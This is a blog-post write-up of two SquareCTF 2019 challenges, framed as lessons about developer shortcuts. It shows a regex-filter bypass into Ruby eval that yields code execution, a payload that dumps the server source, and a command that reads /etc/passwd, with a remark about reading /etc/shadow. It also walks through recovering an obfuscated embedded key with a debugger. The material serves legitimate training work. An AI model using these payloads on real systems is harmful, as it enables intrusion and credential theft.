Abusing Common Bad Development Decisions in the 2019 SquareCTF

Doug Rickert
Nov 8 · 7 min read

I try to do security Capture the Flags (CTFs) regularly, as they come up and I’m available. They’re usually a great way to play with the latest vulnerabilities, learn new technologies, and sharpen your program and system debugging in general. At times I’ll be working a software-development-focused job outside of security, and people will comment that it’s interesting I do these even though I may not be in a security organization at the time. I like to joke that learning how to hack and break web apps and systems is the fun way to learn Linux and software development patterns in general.

And while a lot of the challenges seem totally outlandish, there are usually a few situations where I can remember making a decision as a software developer that could have landed me in the scenario the CTF is modeled around. I remember thinking in those situations, “this isn’t the most secure, but this security guidance is pretty generic… does it really apply to my situation?” And then I make the decision to meet a deadline, or to minimize the work I’m doing in an area of code I don’t want to be in, and I use a “development bandaid” 😅

I use the term “development bandaid” for something you put in the code knowing it probably shouldn’t be there, but it makes your life easier in the short term and you “swear you’ll come back and fix it later” 😏

So, I wanted to share two situations that recently came up in the awesome CTF that Square put on this year: https://squarectf.com/2019/index.html


Challenge 1: Talk to Me

The first challenge for SquareCTF was fairly simple. There was a service running on a port, and when you connected to it and gave some input like “Hi”, you got this:

$> nc localhost 5678
Hello!
Hi
Sorry, I can’t understand you.

$>

So, we can guess that the program is looking for a specific input. We don’t have any information about it, though, so you put on your security researcher hat and start playing with it. A popular technique is to “fuzz” inputs (i.e., try a bunch of different character combinations) and see how the application reacts. So, we try different inputs, including “11”:

$> nc localhost 5678
Hello!
11
undefined method `match' for 11:Integer
/talk_to_me.rb:16:in `receive_data'
/var/lib/gems/2.5.0/gems/eventmachine-1.2.7/lib/eventmachine.rb:195:in `run_machine'
/var/lib/gems/2.5.0/gems/eventmachine-1.2.7/lib/eventmachine.rb:195:in `run'
/talk_to_me.rb:31:in `<main>'
$>

Bingo! We’ve gotten an error message. How many of us have left error messages in the output because it makes it easier to debug when customers file tickets? ✋ Well, this is our first bandaid to expose. Why does this bandaid matter? Let’s keep going a little further.
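The kind of fuzzing loop described above can be sketched in a few lines of Ruby. This is a hypothetical toy, not a real fuzzer: it just opens a fresh connection per candidate input and records the server’s reaction.

```ruby
require "socket"

# Candidate inputs to throw at the service; a real fuzzer would
# generate far more combinations.
CANDIDATES = ["Hi", "11", ",", "'", "{}", "1+1"]

# Open a connection per input, consume the banner, send the input,
# and capture the first line of whatever comes back.
def fuzz(host, port, inputs)
  inputs.map do |input|
    sock = TCPSocket.new(host, port)
    sock.gets                  # consume the "Hello!" banner
    sock.puts(input)
    reply = sock.gets&.strip   # first line of the response, if any
    sock.close
    [input, reply]
  end
end

# fuzz("localhost", 5678, CANDIDATES).each { |i, r| puts "#{i.inspect} => #{r}" }
```

Watching which inputs produce “Sorry, I can’t understand you.” versus a stack trace is exactly how the interesting cases below surface.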

As our fuzzer keeps trying different inputs, eventually it tries a “,”:

$> nc localhost 5678
Hello!
,
(eval):1: syntax error, unexpected ','
/talk_to_me.rb:16:in `eval'
/talk_to_me.rb:16:in `receive_data'
/var/lib/gems/2.5.0/gems/eventmachine-1.2.7/lib/eventmachine.rb:195:in `run_machine'
/var/lib/gems/2.5.0/gems/eventmachine-1.2.7/lib/eventmachine.rb:195:in `run'
/talk_to_me.rb:31:in `<main>'
$>

Wait a minute… did that say eval? The eval function is one of those functions that exists in just about every scripting language (JavaScript, Python, Ruby, to name a few), and every language’s documentation says to NEVER use it because of the huge security concerns… and yet there it is in so many languages 🙄. Essentially, it lets you pass code in at runtime and have it be… well, evaluated. That means you can do just about anything on the server that the service’s user account has power over.
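As a quick illustration of why that’s scary (a trivial sketch, nothing challenge-specific):

```ruby
# eval takes a string and executes it as Ruby source at runtime,
# with full access to the caller's environment.
eval("2 + 2")           # => 4
eval("[1, 2, 3].sum")   # => 6

# Nothing stops the string from being "File.read('/etc/shadow')" or a
# shell command, which is why user input must never reach eval.
```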

But, how many of us have ever had to interact with someone else’s code and, for one reason or another, didn’t have the ability or time to refactor it? ✋ <- there’s me, with my hand raised, just about every day I write software. In this case though, eval is REALLY bad and seems to be running on our input, so what did the developer probably do in this situation? They used a regex to sanitize user input so we “couldn’t” pass malicious code to the eval. See how “couldn’t” is in quotes? Yeah.

So, since this is not an uber-detailed penetration-testing write-up, we fast-forward through the exploit development: we deduce from the error message that it’s Ruby code, we look up common Ruby regex mistakes, find that Ruby regexes handle newlines in a surprising way, play around a bit, and we get this:

$> cat test.txt
{}
self.test
$> cat test.txt | nc localhost 5678
Hello!
private method `test' called for #<TalkToMeServer::EM_CONNECTION_CLASS:0x00005626e4d1beb8>
/talk_to_me.rb:16:in `eval'
/talk_to_me.rb:16:in `eval'
/talk_to_me.rb:16:in `receive_data'
/var/lib/gems/2.5.0/gems/eventmachine-1.2.7/lib/eventmachine.rb:195:in `run_machine'
/var/lib/gems/2.5.0/gems/eventmachine-1.2.7/lib/eventmachine.rb:195:in `run'
/talk_to_me.rb:31:in `<main>'
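Why did that two-line payload work? In a Ruby regex, `$` matches before any newline, not just at the absolute end of the string (that’s `\z`). Using the sanitization pattern that turns up in the challenge source below:

```ruby
# The filter from talk_to_me.rb: \A anchors the start of the string,
# but $ matches at the end of a LINE, i.e. before any newline.
FILTER = /\A[\d<>(){}|+-=*\/%\s\'\"]+$/

plain   = "self.test"        # letters are not in the character class
payload = "{}\nself.test"    # first line satisfies the filter...

plain   =~ FILTER    # => nil (rejected)
payload =~ FILTER    # => 0   (accepted: $ stops at the \n,
                     #         but eval still runs BOTH lines)
```

Anchoring with `\A...\z` instead of `\A...$` would have closed this hole.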

Cool, we’re running arbitrary Ruby code! We can now go look up the eventmachine gem, and we find that there is a send_file_data() method. Since we know the location of the code we’re running (again, detailed error messages in output are bad), we can dump the source:

$> cat test.txt
{}
self.send_file_data('/talk_to_me.rb')
$> cat test.txt | nc localhost 5678
Hello!
require 'eventmachine'
require 'socket'

module TalkToMeServer
  def post_init
    set_comm_inactivity_timeout(3)
    send_data "Hello!\n"
  end

  def receive_data data
    if data =~ /magicdebugstring/
      send_data "hostname: " + Socket.gethostname + "\n"
    end
    if data =~ /\A[\d<>(){}|+-=*\/%\s\'\"]+$/
      begin
        if eval(data)&.match(/\A.*(hello).*$/i)

We have source code, we have arbitrary code execution, and at this point we can find out that the flag is in an environment variable, so we can just read ENV['FLAG'] and get it. But let’s do one more thing unrelated to the CTF, because it’s fun:

$> cat test.txt
{}
self.send_data(`cat /etc/passwd ; echo "end"`)
$> cat test.txt | nc localhost 5678
Hello!
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin

We have arbitrary command execution on the host (we ran the bash command “cat /etc/passwd”)! I could also dump /etc/shadow, which holds the hashed passwords of any local accounts… or just change a user’s password entirely so I could log in another way 😃
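Those backticks in the payload are plain Ruby syntax: the text between them is handed to a shell, and the command’s standard output comes back as a string. That’s how one eval gadget becomes full command execution:

```ruby
# Backticks spawn a shell, run the command, and capture its stdout.
output = `echo hello from the shell`
output.strip   # => "hello from the shell"

# Kernel#system, IO.popen, and %x{} give the same power through
# other doors, so filtering just the backtick character wouldn't help.
```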

So let’s review what bandaids needed to be there for this to work:

  • The developer put verbose, detailed error logs in the output. This let us notice that eval was being called and that match was being called, showed us exactly which library was in use so we knew what methods were at our disposal, and finally revealed the location of the source code. And to think, this bandaid was supposed to make our life easier.
  • The developer did try to sanitize their user input (this is good!) to protect a dangerous area of their code. However, the sanitization ultimately failed, and we could run whatever code we wanted. Two bandaids here: very dangerous functionality that should’ve been refactored, and a mitigation that was never properly reviewed for edge cases by security.

Challenge 2: Aesni

This one I really liked because it deals with improper secrets management, and a developer thinking they’re very clever hiding that impropriety. Secrets management is something every developer deals with day to day, and every developer has done something with secrets that they know is kind of sketchy, but they do it anyway. Whether it’s plaintext credentials on the filesystem or hard-coding them into your application 🙀

You may have one day thought, “but I really do have to embed this secret into this binary” (no, you probably don’t). And you probably thought, “I read about this cool binary obfuscation technique that Stuxnet used, I can use that” (no, please don’t!). But you do some sort of obfuscation anyway, and it gets past the “strings” command, which is the common way to check whether there are any hardcoded strings in a binary that shouldn’t be there:

$ strings aesni
flap-d0d8411ec06-- alok & mbyczkowski{c
`R B\]
VVVT
~?Otzi]xaGmF
a77;7i719codZ{+A170gmj6eb221
JV\]k
d38;`*e
u _5?8gldech4>
`d0d8b3b?d4d
nLpP
TRSQ
`4071c71`1i0E
XB_G
N,uI-c6>9ee1d5jeX#
Vy4668bkjdbk16
z{B0d78ba26d5i1h
5`736n9j94n0
.shstrtab
.text

$

But, as an attacker, I’m just going to load your binary into a reverse engineering debugger (in this case edb, or Evan’s Debugger, which comes preloaded in Kali). I can even shorten the time I spend watching your machine code run by looking specifically for where a compare (cmp in x86 assembly) happens… in this case it was a cmpsb instruction.

The ESI register holds the key that was super secretly embedded into the binary, because the program eventually has to compare it to my input in the EDI register (my input was “test”). To be fair, this was fairly secretly embedded: “ThIs-iS-fInE” doesn’t exist in memory until you let the portion of code run that builds that secret string from the obfuscation mechanism, right before the compare.
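The general shape of such a scheme looks like the XOR sketch below. To be clear, this is an illustrative stand-in, not the challenge’s actual obfuscation: the secret is stored transformed, so “strings” never sees the plaintext, and it only gets reassembled right before the compare.

```ruby
XOR_KEY = 0x42

# The stored bytes: the secret XOR'd with a key, so a raw scan of the
# shipped data never finds the plaintext. (In a real program the
# literal below would only exist at build time, not in the binary.)
OBFUSCATED = "ThIs-iS-fInE".bytes.map { |b| b ^ XOR_KEY }

# The plaintext exists in memory only after this runs, which is exactly
# the moment a breakpoint on the compare instruction catches it.
def recovered_secret
  OBFUSCATED.map { |b| (b ^ XOR_KEY).chr }.join
end
```

Since the shipped artifact necessarily contains both the obfuscated bytes and the rebuild routine, a debugger just runs the rebuild for you and reads the result.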

So, your code may pass something as simple as the “strings” command plus an eyeball check, or even the “Static Analyzer” tool that security makes you run your binary through to keep you from committing this awful security infraction. But you used this development bandaid so you didn’t have to take the time to do proper secrets management (and to avoid security blocking your binary from reaching production), and here we are:

$ ./aesni ThIs-iS-fInE
flag-cdce7e89a7607239

Challenge 5: Inwasmble (https://squarectf.com/2019/inwasmble.html) took a similar approach with an embedded key that is dynamically created and compared byte by byte to a user’s input. It’s pretty long and looks largely the same as this one, so I’m not going to go into the details of how I solved it. But, again, you can follow a similar pattern and walk through it in the debugger to extract a key. If you are convinced you’re smart enough to embed a key into something a user has full control over, try that challenge out or just walk through a different 2019 SquareCTF write-up. I hope it makes you rethink your confidence 😃


Conclusion

CTFs are a fun way to learn different technologies and techniques, and they often have scenarios that hit home. In this CTF, what hit home for me was:

  • Deciding how to properly handle secrets for a program I’m writing
  • Balancing verbose error messages that make troubleshooting easier against not giving away too many details
  • Relying on legacy code that I don’t have time to refactor

And when you think you’re clever and above the generic security guidance because you’ve got a super awesome mitigation that blocks something bad from happening, well, you should still make sure someone in your security org can review your level of clever. Because it’s likely a lot easier for an attacker to get around your mitigation than you think.
